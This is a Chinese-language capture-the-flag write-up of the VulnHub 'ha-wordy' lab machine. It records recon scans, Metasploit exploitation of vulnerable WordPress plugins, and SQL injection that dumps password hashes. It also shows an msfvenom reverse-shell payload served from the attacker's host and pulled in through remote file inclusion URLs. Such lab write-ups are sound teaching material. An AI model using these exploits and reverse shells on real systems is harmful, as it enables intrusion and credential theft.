ha-wordy-Write-up

信息收集

➜  ~ nmap -sn 192.168.116.1/24      
Starting Nmap 7.80 ( https://nmap.org ) at 2019-09-25 22:08 CST
Nmap scan report for 192.168.116.1
Host is up (0.0025s latency).
Nmap scan report for 192.168.116.138
Host is up (0.00072s latency).
Nmap done: 256 IP addresses (2 hosts up) scanned in 4.94 seconds
➜  ~ nmap -A -T4 192.168.116.138 -p-
Starting Nmap 7.80 ( https://nmap.org ) at 2019-09-25 22:09 CST
Nmap scan report for 192.168.116.138
Host is up (0.0039s latency).
Not shown: 65534 closed ports
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.22 seconds
➜  ~
  • IP为:192.168.116.138,只开放了一个80端口,主页还是Apache2的默认页。
  • 先扫目录,-r不递归扫
➜  ~ dirb http://192.168.116.138 -r

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Wed Sep 25 22:17:39 2019
URL_BASE: http://192.168.116.138/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
OPTION: Not Recursive

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://192.168.116.138/ ----
+ http://192.168.116.138/index.html (CODE:200|SIZE:10918)                                                                                                                                                                                     
+ http://192.168.116.138/info.php (CODE:200|SIZE:15)                                                                                                                                                                                          
==> DIRECTORY: http://192.168.116.138/javascript/                                                                                                                                                                                             
+ http://192.168.116.138/server-status (CODE:403|SIZE:280)                                                                                                                                                                                    
==> DIRECTORY: http://192.168.116.138/wordpress/                                                                                                                                                                                              
                                                                                                                                                                                                                                              
-----------------
END_TIME: Wed Sep 25 22:17:42 2019
DOWNLOADED: 4612 - FOUND: 3
➜  ~
  • 发现了一个info.php,又是WordPress。
➜  ~ curl "http://192.168.116.138/info.php"          
192.168.116.138%                                                                                                                                                                                                            ➜  ~
  • 访问info.php返回了服务器端的IP地址,那再扫WordPress
➜  ~ wpscan --url http://192.168.116.138/wordpress/
_______________________________________________________________
        __          _______   _____
        \ \        / /  __ \ / ____|
         \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
          \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
           \  /\  /  | |     ____) | (__| (_| | | | |
            \/  \/   |_|    |_____/ \___|\__,_|_| |_|

        WordPress Security Scanner by the WPScan Team
                       Version 3.6.3
          Sponsored by Sucuri - https://sucuri.net
      @_WPScan_, @ethicalhack3r, @erwan_lr, @_FireFart_
_______________________________________________________________

[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N]y
[i] Updating the Database ...
[i] Update completed.

[+] URL: http://192.168.116.138/wordpress/
[+] Started: Wed Sep 25 22:23:22 2019

Interesting Finding(s):

[+] http://192.168.116.138/wordpress/
 | Interesting Entry: Server: Apache/2.4.29 (Ubuntu)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] http://192.168.116.138/wordpress/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access

[+] http://192.168.116.138/wordpress/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] Upload directory has listing enabled: http://192.168.116.138/wordpress/wp-content/uploads/
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] http://192.168.116.138/wordpress/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 5.2.3 identified (Latest, released on 2019-09-05).
 | Detected By: Rss Generator (Passive Detection)
 |  - http://192.168.116.138/wordpress/index.php/feed/, <generator>https://wordpress.org/?v=5.2.3</generator>
 |  - http://192.168.116.138/wordpress/index.php/comments/feed/, <generator>https://wordpress.org/?v=5.2.3</generator>

[+] WordPress theme in use: twentysixteen
 | Location: http://192.168.116.138/wordpress/wp-content/themes/twentysixteen/
 | Latest Version: 2.0 (up to date)
 | Last Updated: 2019-05-07T00:00:00.000Z
 | Readme: http://192.168.116.138/wordpress/wp-content/themes/twentysixteen/readme.txt
 | Style URL: http://192.168.116.138/wordpress/wp-content/themes/twentysixteen/style.css?ver=5.2.3
 | Style Name: Twenty Sixteen
 | Style URI: https://wordpress.org/themes/twentysixteen/
 | Description: Twenty Sixteen is a modernized take on an ever-popular WordPress layout — the horizontal masthead ...
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 |
 | Detected By: Css Style (Passive Detection)
 |
 | Version: 2.0 (80% confidence)
 | Detected By: Style (Passive Detection)
 |  - http://192.168.116.138/wordpress/wp-content/themes/twentysixteen/style.css?ver=5.2.3, Match: 'Version: 2.0'

[+] Enumerating All Plugins (via Passive Methods)
[+] Checking Plugin Versions (via Passive and Aggressive Methods)

[i] Plugin(s) Identified:

[+] mail-masta
 | Location: http://192.168.116.138/wordpress/wp-content/plugins/mail-masta/
 | Latest Version: 1.0 (up to date)
 | Last Updated: 2014-09-19T07:52:00.000Z
 |
 | Detected By: Urls In Homepage (Passive Detection)
 |
 | [!] 2 vulnerabilities identified:
 |
 | [!] Title: Mail Masta 1.0 - Unauthenticated Local File Inclusion (LFI)
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/8609
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10956
 |      - https://www.exploit-db.com/exploits/40290/
 |      - https://cxsecurity.com/issue/WLB-2016080220
 |
 | [!] Title: Mail Masta 1.0 - Multiple SQL Injection
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/8740
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6095
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6096
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6097
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6098
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6570
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6571
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6572
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6573
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6574
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6575
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6576
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6577
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6578
 |      - https://github.com/hamkovic/Mail-Masta-Wordpress-Plugin
 |
 | Version: 1.0 (100% confidence)
 | Detected By: Readme - Stable Tag (Aggressive Detection)
 |  - http://192.168.116.138/wordpress/wp-content/plugins/mail-masta/readme.txt
 | Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
 |  - http://192.168.116.138/wordpress/wp-content/plugins/mail-masta/readme.txt

[+] reflex-gallery
 | Location: http://192.168.116.138/wordpress/wp-content/plugins/reflex-gallery/
 | Last Updated: 2019-05-10T16:05:00.000Z
 | [!] The version is out of date, the latest version is 3.1.7
 |
 | Detected By: Urls In Homepage (Passive Detection)
 |
 | [!] 2 vulnerabilities identified:
 |
 | [!] Title: Reflex Gallery <= 3.1.3 - Arbitrary File Upload
 |     Fixed in: 3.1.4
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/7867
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4133
 |      - https://www.exploit-db.com/exploits/36374/
 |      - https://packetstormsecurity.com/files/130845/
 |      - https://packetstormsecurity.com/files/131515/
 |      - https://www.rapid7.com/db/modules/exploit/unix/webapp/wp_reflexgallery_file_upload
 |
 | [!] Title: Multiple Plugins - jQuery prettyPhoto DOM Cross-Site Scripting (XSS)
 |     Fixed in: 3.1.5
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/7985
 |      - https://blog.anantshri.info/forgotten_disclosure_dom_xss_prettyphoto
 |      - https://github.com/scaron/prettyphoto/issues/149
 |      - https://github.com/wpscanteam/wpscan/issues/818
 |
 | Version: 3.1.3 (80% confidence)
 | Detected By: Readme - Stable Tag (Aggressive Detection)
 |  - http://192.168.116.138/wordpress/wp-content/plugins/reflex-gallery/readme.txt

[+] site-editor
 | Location: http://192.168.116.138/wordpress/wp-content/plugins/site-editor/
 | Latest Version: 1.1.1 (up to date)
 | Last Updated: 2017-05-02T23:34:00.000Z
 |
 | Detected By: Urls In Homepage (Passive Detection)
 |
 | [!] 1 vulnerability identified:
 |
 | [!] Title: Site Editor <= 1.1.1 - Local File Inclusion (LFI)
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/9044
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7422
 |      - http://seclists.org/fulldisclosure/2018/Mar/40
 |      - https://github.com/SiteEditor/editor/issues/2
 |
 | Version: 1.1.1 (80% confidence)
 | Detected By: Readme - Stable Tag (Aggressive Detection)
 |  - http://192.168.116.138/wordpress/wp-content/plugins/site-editor/readme.txt

[+] slideshow-gallery
 | Location: http://192.168.116.138/wordpress/wp-content/plugins/slideshow-gallery/
 | Last Updated: 2019-07-12T13:09:00.000Z
 | [!] The version is out of date, the latest version is 1.6.12
 |
 | Detected By: Urls In Homepage (Passive Detection)
 |
 | [!] 5 vulnerabilities identified:
 |
 | [!] Title: Slideshow Gallery < 1.4.7 Arbitrary File Upload
 |     Fixed in: 1.4.7
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/7532
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5460
 |      - https://www.exploit-db.com/exploits/34681/
 |      - https://www.exploit-db.com/exploits/34514/
 |      - http://seclists.org/bugtraq/2014/Sep/1
 |      - https://packetstormsecurity.com/files/131526/
 |      - https://www.rapid7.com/db/modules/exploit/unix/webapp/wp_slideshowgallery_upload
 |
 | [!] Title: Tribulant Slideshow Gallery <= 1.5.3 - Arbitrary file upload & Cross-Site Scripting (XSS) 
 |     Fixed in: 1.5.3.4
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/8263
 |      - http://cinu.pl/research/wp-plugins/mail_5954cbf04cd033877e5415a0c6fba532.html
 |      - http://blog.cinu.pl/2015/11/php-static-code-analysis-vs-top-1000-wordpress-plugins.html
 |
 | [!] Title: Tribulant Slideshow Gallery <= 1.6.4 - Authenticated Cross-Site Scripting (XSS)
 |     Fixed in: 1.6.5
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/8786
 |      - https://sumofpwn.nl/advisory/2016/cross_site_scripting_vulnerability_in_tribulant_slideshow_galleries_wordpress_plugin.html
 |      - https://plugins.trac.wordpress.org/changeset/1609730/slideshow-gallery
 |
 | [!] Title: Slideshow Gallery <= 1.6.5 - Multiple Authenticated Cross-Site Scripting (XSS)
 |     Fixed in: 1.6.6
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/8795
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-17946
 |      - http://www.defensecode.com/advisories/DC-2017-01-014_WordPress_Tribulant_Slideshow_Gallery_Plugin_Advisory.pdf
 |      - https://packetstormsecurity.com/files/142079/DC-2017-01-014.pdf
 |
 | [!] Title: Slideshow Gallery <= 1.6.8 - XSS and SQLi
 |     Fixed in: 1.6.9
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/9354
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-18017
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-18018
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-18019
 |      - https://plugins.trac.wordpress.org/changeset?reponame=&new=1974812%40slideshow-gallery&old=1907382%40slideshow-gallery
 |      - https://ansawaf.blogspot.com/2019/04/xss-and-sqli-in-slideshow-gallery.html
 |
 | Version: 1.4.6 (100% confidence)
 | Detected By: Readme - Stable Tag (Aggressive Detection)
 |  - http://192.168.116.138/wordpress/wp-content/plugins/slideshow-gallery/readme.txt
 | Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
 |  - http://192.168.116.138/wordpress/wp-content/plugins/slideshow-gallery/readme.txt

[+] wp-easycart-data
 | Location: http://192.168.116.138/wordpress/wp-content/plugins/wp-easycart-data/
 |
 | Detected By: Urls In Homepage (Passive Detection)
 |
 | The version could not be determined.

[+] wp-support-plus-responsive-ticket-system
 | Location: http://192.168.116.138/wordpress/wp-content/plugins/wp-support-plus-responsive-ticket-system/
 | Last Updated: 2019-09-03T07:57:00.000Z
 | [!] The version is out of date, the latest version is 9.1.2
 |
 | Detected By: Urls In Homepage (Passive Detection)
 |
 | [!] 4 vulnerabilities identified:
 |
 | [!] Title: WP Support Plus Responsive Ticket System <= 7.1.3 – Authenticated SQL Injection
 |     Fixed in: 8.0.0
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/8699
 |      - https://www.exploit-db.com/exploits/40939/
 |      - http://lenonleite.com.br/en/blog/2016/12/13/wp-support-plus-responsive-ticket-system-wordpress-plugin-sql-injection/
 |      - https://plugins.trac.wordpress.org/changeset/1556644/wp-support-plus-responsive-ticket-system
 |
 | [!] Title: WP Support Plus Responsive Ticket System <= 8.0.7 - Remote Code Execution (RCE)
 |     Fixed in: 8.0.8
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/8949
 |      - https://plugins.trac.wordpress.org/changeset/1763596/wp-support-plus-responsive-ticket-system
 |
 | [!] Title: WP Support Plus Responsive Ticket System <= 9.0.2 - Multiple Authenticated SQL Injection
 |     Fixed in: 9.0.3
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/9041
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1000131
 |      - https://github.com/00theway/exp/blob/master/wordpress/wpsupportplus.md
 |      - https://plugins.trac.wordpress.org/changeset/1814103/wp-support-plus-responsive-ticket-system
 |
 | [!] Title: WP Support Plus Responsive Ticket System <= 9.1.1 - Stored XSS
 |     Fixed in: 9.1.2
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/9235
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7299
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15331
 |      - https://cert.kalasag.com.ph/news/research/cve-2019-7299-stored-xss-in-wp-support-plus-responsive-ticket-system/
 |      - https://plugins.trac.wordpress.org/changeset/2024484/wp-support-plus-responsive-ticket-system
 |
 | Version: 7.1.3 (100% confidence)
 | Detected By: Readme - Stable Tag (Aggressive Detection)
 |  - http://192.168.116.138/wordpress/wp-content/plugins/wp-support-plus-responsive-ticket-system/readme.txt
 | Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
 |  - http://192.168.116.138/wordpress/wp-content/plugins/wp-support-plus-responsive-ticket-system/readme.txt

[+] wp-symposium
 | Location: http://192.168.116.138/wordpress/wp-content/plugins/wp-symposium/
 | Last Updated: 2015-08-21T12:36:00.000Z
 | [!] The version is out of date, the latest version is 15.8.1
 |
 | Detected By: Urls In Homepage (Passive Detection)
 |
 | [!] 7 vulnerabilities identified:
 |
 | [!] Title: WP Symposium 13.04 - Unvalidated Redirect
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/6383
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2694
 |
 | [!] Title: WP Symposium <= 12.07.07 - Authentication Bypass
 |     Reference: https://wpvulndb.com/vulnerabilities/6390
 |
 | [!] Title: WP Symposium <= 14.11 - Unauthenticated Shell Upload
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/7716
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-10021
 |      - https://www.exploit-db.com/exploits/35543/
 |      - https://www.exploit-db.com/exploits/35778/
 |      - http://www.homelab.it/index.php/2014/12/11/wordpress-wp-symposium-shell-upload/
 |      - https://www.youtube.com/watch?v=pF8lIuLT6Vs
 |      - http://blog.sucuri.net/2014/12/wp-symposium-zero-day-vulnerability-dangers.html
 |      - https://packetstormsecurity.com/files/129884/
 |      - https://www.rapid7.com/db/modules/exploit/unix/webapp/wp_symposium_shell_upload
 |
 | [!] Title: WP Symposium <= 15.1 - SQL Injection
 |     Fixed in: 15.4
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/7902
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3325
 |      - https://www.exploit-db.com/exploits/37080/
 |      - http://web.archive.org/web/20150718010246/http://permalink.gmane.org/gmane.comp.security.oss.general/16479
 |      - https://packetstormsecurity.com/files/131801/
 |
 | [!] Title: WP Symposium <=  15.5.1 - Unauthenticated SQL Injection
 |     Fixed in: 15.8
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/8140
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6522
 |      - https://www.exploit-db.com/exploits/37824/
 |      - https://plugins.trac.wordpress.org/changeset/1214872/wp-symposium
 |
 | [!] Title: WP Symposium <= 15.1 - Blind SQL Injection
 |     Fixed in: 15.8
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/8148
 |      - https://security.dxw.com/advisories/blind-sql-injection-in-wp-symposium-allows-unauthenticated-attackers-to-access-sensitive-data/
 |
 | [!] Title: WP Symposium <= 15.8.1 - Unauthenticated Reflected Cross-Site Scripting (XSS)
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/8175
 |      - http://cxsecurity.com/issue/WLB-2015090024
 |
 | Version: 15.1 (80% confidence)
 | Detected By: Readme - Stable Tag (Aggressive Detection)
 |  - http://192.168.116.138/wordpress/wp-content/plugins/wp-symposium/readme.txt

[+] Enumerating Config Backups (via Passive and Aggressive Methods)
 Checking Config Backups - Time: 00:00:00 <==================================================================================================================================================================> (21 / 21) 100.00% Time: 00:00:00

[i] No Config Backups Found.


[+] Finished: Wed Sep 25 22:23:25 2019
[+] Requests Done: 78
[+] Cached Requests: 5
[+] Data Sent: 23.706 KB
[+] Data Received: 17.527 MB
[+] Memory used: 207.039 MB
[+] Elapsed time: 00:00:03
➜  ~
  • 这次还真扫出来可以利用的漏洞了,文件包含,SQL注入,文件上传,RCE都有。
  • SQL注入的:
https://github.com/hamkovic/Mail-Masta-Wordpress-Plugin-SQL-Injection-Vulnerability
https://ansawaf.blogspot.com/2019/04/xss-and-sqli-in-slideshow-gallery.html
https://www.exploit-db.com/exploits/40939/
  • 文件包含的:
https://www.exploit-db.com/exploits/40290/
  • 文件上传的:
https://www.rapid7.com/db/modules/exploit/unix/webapp/wp_reflexgallery_file_upload
https://www.exploit-db.com/exploits/36374/
https://www.exploit-db.com/exploits/34681/
https://www.exploit-db.com/exploits/34514/
https://www.rapid7.com/db/modules/exploit/unix/webapp/wp_slideshowgallery_upload
https://www.rapid7.com/db/modules/exploit/unix/webapp/wp_symposium_shell_upload
  • 绕过认证的:
https://plugins.trac.wordpress.org/changeset/1763596/wp-support-plus-responsive-ticket-system
  • 利用链接,rapid7的在MSF里都可以直接利用,exp-db要手动测试。
➜  ~ wpscan --enumerate p --url http://192.168.116.138/wordpress/ |grep exp   
 |      - https://www.exploit-db.com/exploits/40290/
 |      - https://www.exploit-db.com/exploits/36374/
 |      - https://www.rapid7.com/db/modules/exploit/unix/webapp/wp_reflexgallery_file_upload
 |      - https://www.exploit-db.com/exploits/34681/
 |      - https://www.exploit-db.com/exploits/34514/
 |      - https://www.rapid7.com/db/modules/exploit/unix/webapp/wp_slideshowgallery_upload
 |      - https://www.exploit-db.com/exploits/40939/
 |      - https://github.com/00theway/exp/blob/master/wordpress/wpsupportplus.md
 |      - https://www.exploit-db.com/exploits/35543/
 |      - https://www.exploit-db.com/exploits/35778/
 |      - https://www.rapid7.com/db/modules/exploit/unix/webapp/wp_symposium_shell_upload
 |      - https://www.exploit-db.com/exploits/37080/
 |      - https://www.exploit-db.com/exploits/37824/
➜  ~
  • 为了方便就直接使用MSF了,应该这几个都可以用。
msf5 exploit(unix/webapp/wp_reflexgallery_file_upload) > show options 

Module options (exploit/unix/webapp/wp_reflexgallery_file_upload):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     192.168.116.138  yes       The target address range or CIDR identifier
   RPORT      80               yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /wordpress       yes       The base path to the wordpress application
   VHOST                       no        HTTP server virtual host


Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.116.1    yes       The listen address (an interface may be specified)
   LPORT  7788             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Reflex Gallery 3.1.3


msf5 exploit(unix/webapp/wp_reflexgallery_file_upload) > 
msf5 exploit(unix/webapp/wp_reflexgallery_file_upload) > run 

[*] Started reverse TCP handler on 192.168.116.1:7788 
[+] Our payload is at: QkwaQFsdu.php. Calling payload...
[*] Calling payload...
[*] Sending stage (38247 bytes) to 192.168.116.138
[*] Meterpreter session 1 opened (192.168.116.1:7788 -> 192.168.116.138:41290) at 2019-09-26 10:28:04 +0800
[+] Deleted QkwaQFsdu.php
meterpreter >

SQL注入

  • 连着把其他的都试一遍,第二个需要账号密码试不了。
msf5 exploit(unix/webapp/wp_symposium_shell_upload) > use auxiliary/admin/http/wp_symposium_sql_injection 
msf5 auxiliary(admin/http/wp_symposium_sql_injection) > show options 

Module options (auxiliary/admin/http/wp_symposium_sql_injection):

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   Proxies                      no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                       yes       The target address range or CIDR identifier
   RPORT       80               yes       The target port (TCP)
   SSL         false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI   /                yes       The base path to the wordpress application
   URI_PLUGIN  wp-symposium     yes       The WordPress Symposium Plugin URI
   VHOST                        no        HTTP server virtual host

msf5 auxiliary(admin/http/wp_symposium_sql_injection) > set rhosts 192.168.116.138
rhosts => 192.168.116.138
msf5 auxiliary(admin/http/wp_symposium_sql_injection) > set targeturi /wordpress
targeturi => /wordpress
msf5 auxiliary(admin/http/wp_symposium_sql_injection) > run 
[*] Running module against 192.168.116.138

[+] 192.168.116.138:80 - admin           $P$BYWgfD7pa572QS9YFoeVVmhrIhBAx0. abc@gmail.com
[+] 192.168.116.138:80 -                                                    
[+] 192.168.116.138:80 - aarti           $P$BHyn.q5e5/HG9/UT/Ow3xkH2xXsikx0 aarti@gmail.com
[*] Auxiliary module execution completed
msf5 auxiliary(admin/http/wp_symposium_sql_injection) >
  • SQL注入获取到了密码,但是加密了,john爆破无果。
  • 回去看第一个session,切换到home目录找到第一个flag。
meterpreter > cd raj
meterpreter > ls
Listing: /home/raj
==================

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
100600/rw-------  4770  fil   2019-09-11 12:54:51 +0800  .ICEauthority
100600/rw-------  232   fil   2019-09-11 12:57:45 +0800  .bash_history
100644/rw-r--r--  220   fil   2019-09-09 14:15:07 +0800  .bash_logout
100644/rw-r--r--  3771  fil   2019-09-09 14:15:07 +0800  .bashrc
40700/rwx------   4096  dir   2019-09-09 23:47:31 +0800  .cache
40700/rwx------   4096  dir   2019-09-09 21:20:39 +0800  .config
40700/rwx------   4096  dir   2019-09-09 21:20:05 +0800  .dbus
40700/rwx------   4096  dir   2019-09-09 15:51:12 +0800  .gnupg
40700/rwx------   4096  dir   2019-09-09 21:20:06 +0800  .gvfs
40700/rwx------   4096  dir   2019-09-09 14:20:30 +0800  .local
40700/rwx------   4096  dir   2019-09-09 14:34:23 +0800  .mozilla
100600/rw-------  39    fil   2019-09-09 15:23:00 +0800  .mysql_history
100644/rw-r--r--  807   fil   2019-09-09 14:15:07 +0800  .profile
40700/rwx------   4096  dir   2019-09-09 15:51:12 +0800  .ssh
100644/rw-r--r--  0     fil   2019-09-09 14:21:21 +0800  .sudo_as_admin_successful
40755/rwxr-xr-x   4096  dir   2019-09-10 00:23:02 +0800  Desktop
40755/rwxr-xr-x   4096  dir   2019-09-09 14:20:38 +0800  Documents
40755/rwxr-xr-x   4096  dir   2019-09-09 16:23:53 +0800  Downloads
40755/rwxr-xr-x   4096  dir   2019-09-09 14:20:38 +0800  Music
40755/rwxr-xr-x   4096  dir   2019-09-09 14:20:38 +0800  Pictures
40755/rwxr-xr-x   4096  dir   2019-09-09 14:20:38 +0800  Public
40755/rwxr-xr-x   4096  dir   2019-09-09 14:20:38 +0800  Templates
40755/rwxr-xr-x   4096  dir   2019-09-09 14:20:38 +0800  Videos
100644/rw-r--r--  8980  fil   2019-09-09 14:15:07 +0800  examples.desktop
100644/rw-r--r--  41    fil   2019-09-10 12:06:56 +0800  flag1.txt
40755/rwxr-xr-x   4096  dir   2019-09-09 16:18:54 +0800  plugin

meterpreter > cat flag1.txt
aHR0cHM6Ly93d3cuaGFja2luZ2FydGljbGVzLmlu
meterpreter > 
➜  VulnHub echo "aHR0cHM6Ly93d3cuaGFja2luZ2FydGljbGVzLmlu" |base64 -d
https://www.hackingarticles.in%
  • 在网站的跟目录发现了一个notes.txt文件和一个加密了的zip压缩包
www-data@ubuntu:/var/www/html$ ls
ls
index.html  info.php  notes.txt  secret.zip  wordpress
www-data@ubuntu:/var/www/html$ cat notes.txt
cat notes.txt
You Need to ZIP Your Wayout
www-data@ubuntu:/var/www/html$ cat info.php
cat info.php
<?php
echo $_SERVER['HTTP_HOST'];
?>
www-data@ubuntu:/var/www/html$
  • 密码是上面SQL注入获取到admin密码的Hash
➜  VulnHub unzip secret.zip                                          
Archive:  secret.zip
[secret.zip] link.txt password: 
  inflating: link.txt                
➜  VulnHub cat link.txt    
https://www.exploit-db.com/exploits/38861
https://www.exploit-db.com/exploits/40290
https://www.exploit-db.com/exploits/36374
https://www.exploit-db.com/exploits/37824
https://www.exploit-db.com/exploits/41006%
➜  VulnHub
  • 发现是一堆链接,好像就是我用wpscan扫出来的那些,所以好像没有什么作用,结合notes.txt提示,只是告诉你可以使用多种方法获取Shell。

CVE-2015-8351 远程文件包含

  • 第一个,远程文件包含
  • 开启MSF监听端口
msf5 > use exploit/multi/handler 
msf5 exploit(multi/handler) > set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lport 2333
lport => 2333
msf5 exploit(multi/handler) > set lhost 192.168.116.1
lhost => 192.168.116.1
msf5 exploit(multi/handler) > show options 

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.116.1    yes       The listen address (an interface may be specified)
   LPORT  2333             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf5 exploit(multi/handler) > run 

[*] Started reverse TCP handler on 192.168.116.1:2333 
[*] Sending stage (38247 bytes) to 192.168.116.138
[*] Meterpreter session 1 opened (192.168.116.1:2333 -> 192.168.116.138:42968) at 2019-09-26 11:45:39 +0800

meterpreter >
  • 搭建http,把shell改名为wp-load.php,启动http服务。
➜  VulnHub msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.116.1 LPORT=2333 -o shell.php
[-] No platform was selected, choosing Msf::Module::Platform::PHP from the payload
[-] No arch selected, selecting arch: php from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 1114 bytes
Saved as: shell.php
➜  VulnHub python3.7 -m http.server                                                           
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
192.168.116.138 - - [26/Sep/2019 11:45:11] code 404, message File not found
192.168.116.138 - - [26/Sep/2019 11:45:11] "GET /shell.phpwp-load.php HTTP/1.0" 404 -
^C
Keyboard interrupt received, exiting.
➜  VulnHub 
➜  VulnHub cp shell.php wp-load.php
➜  VulnHub python3.7 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
192.168.116.138 - - [26/Sep/2019 11:45:39] "GET /wp-load.php HTTP/1.0" 200 -
  • 访问http://192.168.116.138/wordpress/wp-content/plugins/gwolle-gb/frontend/captcha/ajaxresponse.php?abspath=http://192.168.116.1:8000/,获取会话成功。

本地文件包含

  • 敏感信息:/etc/apache2/.htpasswd
  • 描述上说是本地文件包含,但是我测的时候可以远程文件包含,所以也获取命令执行更简单了。
  • 访问http://192.168.116.138/wordpress/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=http://192.168.116.1:8000/shell.php就可以获取远程会话了。
  • 本地包含的思路有上传有恶意php代码的文件,找到上传路径,然后包含获取会话。
  • 然后可以包含日志文件可以想办法将一句话存进日志中,一般有Apache的访问日志,ssh链接的失败日志,这主要看服务器开放了哪些服务。但是这台就有点坑,只开了一个Apache,还读不了日志。
  • 但是还是有办法的,还有php支持的各种协议。
